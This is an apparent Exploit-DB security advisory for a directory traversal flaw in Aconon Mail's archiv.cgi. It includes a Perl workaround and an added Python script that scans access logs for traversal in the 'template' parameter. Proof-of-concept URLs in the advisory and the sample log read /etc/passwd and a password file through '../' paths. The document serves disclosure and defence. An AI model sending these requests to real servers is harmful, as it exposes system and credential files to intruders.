Aconon Mail 2004 - Remote Directory Traversal Vulnerability
2008-01-23T00:00:00
ID: EDB-ID:4977 | Type: exploitdb | Reporter: Arno Toll | Modified: 2008-01-23T00:00:00
Description
Aconon Mail 2004 Remote Directory Traversal Vulnerability. CVE-2008-0464. Webapps exploit for cgi platform
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected platforms: every platform Aconon runs on (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is commercial newsletter software that provides
a feature-rich web interface for both users and administrators. This
includes a publicly available archive of sent newsletters. The archived
e-mails can be viewed in a web browser, where they are rendered by a
template engine. Any user can override the template in use by modifying
the HTTP GET "template" form parameter. This parameter is checked for
code injection, but not for directory traversal.
Proof of Concept:
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C
Fix:
No fix has been published yet. However this workaround should patch the
issue:
In archiv.cgi, below the line

    $FORM{'template'} =~ s/\|//g;

add this code:

    use File::Basename;
    # Keep only the file name, dropping any directory components.
    $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) : "";
    # Reject any template that is not a .html file.
    if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {
        &error ("$TXT{'1501'}");
    }

Status: the vendor has been informed.
German readers of the list may also read
http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/
P.S. greets to missi - you're great :o)
# milw0rm.com [2008-01-23]
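
A log check that applies the workaround's rule (a bare file name ending in .html) to the "template" parameter of archiv.cgi requests, as an added example that is not part of the original advisory. The log lines, client addresses and the template name archiv.html are constructed, and the common log format is an assumption about the web server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); addresses and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jan/2008:10:00:01 +0100] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=archiv.html HTTP/1.1" 200 5120
192.0.2.10 - - [23/Jan/2008:10:00:09 +0100] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save HTTP/1.1" 200 5120
198.51.100.7 - - [23/Jan/2008:10:02:13 +0100] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C HTTP/1.1" 200 311
198.51.100.7 - - [23/Jan/2008:10:02:40 +0100] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C HTTP/1.1" 200 1482
203.0.113.5 - - [23/Jan/2008:10:05:02 +0100] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1482
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify_template(value):
    """Return a reason string if `value` breaks the workaround's rule, else None."""
    if value == "":
        return None                      # parameter empty: nothing was overridden
    parts = re.split(r"[/\\]", value)    # treat both separators as path separators
    if ".." in parts:
        return "dot-dot traversal"
    if len(parts) > 1:
        return "path separator"
    if "\x00" in value or not value.endswith(".html"):
        return "not a .html file name"
    return None

def scan(log_text, script="archiv.cgi"):
    """Return (client, status, template, reason) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes once, as the CGI layer does before the script runs.
        for value in parse_qs(url.query, keep_blank_values=True).get("template", []):
            reason = classify_template(value)
            if reason:
                findings.append((client, int(status), value, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request is worth checking against the response size, since it suggests the file was actually served.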